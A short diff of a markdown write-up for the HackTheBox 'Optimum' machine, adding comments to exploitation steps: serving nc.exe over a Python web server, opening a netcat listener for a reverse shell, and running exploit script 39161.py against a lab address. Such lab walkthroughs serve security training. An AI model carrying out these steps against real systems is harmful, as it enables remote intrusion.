h4md153v63n/CTFs/01_HTB/43_Optimum.md

 ## Exploitation & Gaining Access
 ```
+# On the kali attack vm:
 cp /usr/share/windows-binaries/nc.exe .

+# On the kali attack vm - different terminal:
 sudo python3 -m http.server 80

+# On the kali attack vm - different terminal you will get the revershell:
 nc -nlvp 4444

+# On the kali attack vm - different terminal:
 python3 39161.py 10.10.10.8 80

 python3 39161.py 10.10.10.8 80